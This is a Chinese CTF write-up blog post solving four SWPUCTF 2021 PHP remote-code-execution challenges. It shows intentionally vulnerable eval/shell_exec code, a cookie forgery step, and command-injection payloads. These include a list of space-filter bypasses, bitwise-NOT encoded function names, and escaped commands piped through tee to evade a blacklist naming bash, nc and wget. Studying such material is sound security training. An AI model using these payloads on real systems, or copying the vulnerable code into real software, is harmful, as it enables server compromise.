SWPUCTF 2021 新生赛 RCE题目

已于 2023-05-26 18:41:17 修改
阅读量574 收藏 6
点赞数 2
分类专栏: CTF比赛wp 文章标签: php web安全 网络安全
于 2023-05-26 18:40:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74160536/article/details/130889553
版权

快速跳转目录

1.easyrce:

打开环境,直接提示后端代码

 <?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>

可以看出来get一个url变量之后当作命令执行,先phpinfo();一下
在这里插入图片描述有回显,那就直接找文件

system('ls');
system('ls ../');
system('ls ../../');
system('ls ../../../');

找到flag
在这里插入图片描述接着打开它(f*是通配符,匹配所有f开头文件)

system('cat ../../../f*');

得到flag
在这里插入图片描述

2.babyrce

打开环境,已经给出了代码

<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1) 
{
    include "../next.php";
}
else
    echo "小饼干最好吃啦!";
?>

可以看出来是要使cookie值admin为1才能进行下一步,burpsuit抓包,将cookie项改为:admin=1,发送,可以看见给出了另一个文件的地址
在这里插入图片描述打开,发现另一串代码:

 <?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/ /", $ip)){
      die('nonono');
  }
  $a = shell_exec($ip);
  echo $a;
}
?>

可以看见这一行

if(preg_match(“/ /”, $ip))

也就说如果传入的$ip里面有空格,会弹出nonono,并且会将传入的url值当作系统指令执行。
空格绕过的方法有很多,这里我放上error0的《浅谈基础RCE》里面说的空格绕过解决方式(文章地址:https://blog.csdn.net/qq_51295677/article/details/122629200)

%09(url传递)(tab)
%20(space)
${IFS}
$IFS$9
<>(cat<>/flag)
<(cat</flag)
$IFS
{cat,flag}//花括号

选哪一个都可以,我就用第一个了

?url=ls;//和第一个一样的我就不写了
?url=ls%09../;
?url=cat%09../../../f*;

最终得到flag
在这里插入图片描述

3.hardrce

查看代码,难度更上一层

 <?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("LTLT说不能用这些奇奇怪怪的符号哦!");
    }}
if(preg_match('/[a-zA-Z]/is',$wllm))
{
    die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?> 蔡总说:注意审题!!!

先是用黑名单过滤了各种符号

$blacklist = [’ ‘,’\t’,‘\r’,‘\n’,‘+’,‘[’,‘^’,‘]’,‘"’,‘-’,‘$’,‘*’,‘?’,‘<’,‘>’,‘=’,‘`’,];

然后是正则表达式过滤了字母

if(preg_match(‘/[a-zA-Z]/is’,$wllm))

可以选择使用取反运算对命令加密:

<?php
$a="system";
$b="ls";
echo urlencode(~$a);
echo "\n";
echo urlencode(~$b);
?>

得到

%8C%86%8C%8B%9A%92
%93%8C

然后传参:

?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C);

即可完成绕过,接下来就重复上述步骤
最终得到flag
在这里插入图片描述

解释一下这个取反,使用了 PHP 中的 Bitwise NOT (~) 运算符对字符串进行取反,然后将取反后的结果使用 urlencode 函数进行 URL 编码。浏览器对url编码进行解码后可以绕过检测,并且通过~逆向运行代码。

4.finalrce

查看代码,这段 PHP 代码接受一个名为 “url” 的 GET 请求参数,然后使用 preg_match 函数对该参数进行正则匹配,检查其中是否包含一些危险的命令和特殊符号,比如 bash、nc、wget、ping、ls、cat、more、less、phpinfo、base64、echo、php、python、mv、cp、la、-、*、"、>、<、%、$ 等。

<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

还要注意的是,exec函数不会返回内容到网页,所以需要我们用别的方式

url=l\s / | tee 2.txt

代码含义:
l\s /:越过过滤并列出根目录下的文件和目录。
|:将前一个命令的输出作为后一个命令的输入。
tee 1.txt:将输出复制一份并输出到终端窗口以及写入到名为1.txt的文件中。

然后访问1.txt,得到目录
在这里插入图片描述接着传入参数

?url=c\at /flllll\aaaaaaggggggg | tee 2.txt

再访问2.txt,可以获得flag
在这里插入图片描述

c0ld1nk
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
RCE远程命令执行web经典题型解答
shatianyzg的博客
08-14 271
输入127.0.0.1 & cd flag_is_here;cat flag_138811873632297.php,找到flag。输入127.0.0.1%0als#,这里%0a在linux 代表空格,url编码,需要在浏览器中输入。读取到一段字符串,去进行base64解码,在burpsuite中解码。输入127.0.0.1;,空格,cat,flag,ctfhub。将cat换成more命令,再查看源代码,找到flag。输入127.0.0.1;用 cat /flag_20052查到flag。...
网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 5287
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
[SWPUCTF 2021 新生]finalrce
chinese_cabbage0的博客
02-19 389
url=tac /flllll\aaaaaaggggggg | tee 4.txt命令来输出到4.txt文件夹,然后访问就可以获取到flag了。的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。本来应该是url=ls/ 可是ls被过滤掉了,然后看别的up主说,l\s可以代替ls |是执行以下命令的意思。使用tee命令,可以看到的是没有过滤|这个符号,然后exec执行是没有。sleep 5延时了5秒所以可以执行。
[SWPUCTF 2021 新生]babyrce(详解)
A_B_c_d_E_fsad的博客
04-04 1668
最近遇到的事太霉了,又是做到一半,靶机拒绝连接我,搞得我做题都不自信了回到正文题目如下(示例):phpelseecho "小饼干最好吃啦!?>小饼干最好吃啦!看了一下,就是cookie值admin等于1时,就能包含文件,行吧,那就等于吧第一次尝试,用了HackBar直接cookie,嘶?坏了?不确定,就用BurpSuite再试一下(如果成功了,那就跳过这部分,当我没说)第二次,可以是我响应太多没响应到,常规的都不行,那就只能用最原始的办法了。
[SWPUCTF 2021 新生]babyrce
最新发布
2301_80358831的博客
04-28 320
[SWPUCTF 2021 新生]babyrce 主要运用cookie注入和空格过滤
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 891
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
CVE-2021-26855 Exchange RCE.MD
04-23
CVE-2021-26855 Exchange RCE
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTF中WEB题——RCE
tomyyyyy
10-31 5899
CTF中WEB题——RCE 目录CTF中WEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
nssctf web 入门(7)
qq_61988806的博客
04-17 544
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
CTF_WEB学习-------------RCE之命令注入
qq_45616570的博客
07-14 2860
CTF_WEB学习-------------RCE之命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
NSSCTF刷题记录
kindyyy的博客
03-13 749
NSSctf的刷题记录,有错误欢迎指正
BUUCTF [羊城杯 2020]easyre 题解
OrientalGlass的博客
03-08 940
对数字和字母移三位,其他特殊字符不变,要求出加密前的字符串,只需要对数字+7再mod10,对字母+23再mod26,有点补码的感觉在。看到主函数的str2大概就可以猜到是base64,ctrl+f12也可以看到存在base64表。进入该函数后大概看一下不难发现是base64加密并且这题没有换表操作。第三次加密是将code2内的数字和字母移3位,其他字符不变。第一次加密是base64加密,得到code1。三.encode_one_base64。五.encode_three。四.encode_two。
记录第一次ctf比
姜小孩的博客
10-11 1163
第一关是在根据题目提示是在F12里一开始漫无目的的寻找,回头再看看题的时候发现他有提示:看到这都还没找到,有点蠢……然后便往回找,最终找到,第一道题看来是给出的礼物hhhhhhhh 第二关是题目提示是菜刀,但是习惯用蚁剑的我便开始了我的蚁剑之旅,点开环境大大的写着密码是wllm,我非常不好意思的直接连接,找到了flag第二关结束 第三关的题目提示是基操,给我看的蒙蒙的,点开环境仔细读代码原来是让post传id=wllm然后get传json其中json需要用json格式,代码如下: <?php h
博地球杯线下WEB_RCE Write_up
fly小灰灰的专栏
01-30 1437
这次参与博地球杯线下出题,看到巨佬们强还是强啊,先膜一下,然后献上自己的出题思路,萌新出题,轻喷 !!! 第一步、登录 查看网站发现网站无法登录,并且根据robots.txt能发现hint.php和hack.php 不过可以注意到cookie中存在isLogin=0,设置cookie,isLogin=1,发现成功登录 第二步、文件包含 成功登录,发现一个管理页面adm
CTF LFI to RCE
10-20
CTF LFI to RCE是一种常见的网络安全攻击技术,其中LFI代表本地文件包含,RCE代表远程代码执行。攻击者利用LFI漏洞,通过包含恶意代码来实现对目标服务器的攻击,进而实CTF LFI to RCE是一种常见的网络安全攻击技术...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值